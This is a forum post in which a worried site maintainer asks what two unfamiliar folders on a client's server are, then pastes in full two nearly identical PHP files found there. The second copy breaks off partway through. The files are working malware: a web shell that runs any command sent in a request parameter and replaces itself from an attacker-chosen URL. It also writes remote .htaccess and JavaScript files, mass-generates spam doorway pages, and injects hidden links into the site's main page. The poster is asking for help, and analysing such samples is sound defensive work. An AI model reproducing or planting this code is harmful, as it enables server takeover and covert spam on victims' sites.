Stef's Coding Community
Andrea

What is this strange file????


I was just looking at a client's site and noticed two very strange folders that I have nothing to do with. One is called bpbhl and contains only one file - qxn.php which has this in it:

 

Sorry this is so long, but since I have no clue what might be essential and what not, I figure I better post everything. Can anyone tell what this might be about? I'm concerned.

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

The other folder is called euhdy and contains error_log, tur.php, and w.txt (which is empty). tur.php contains:

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
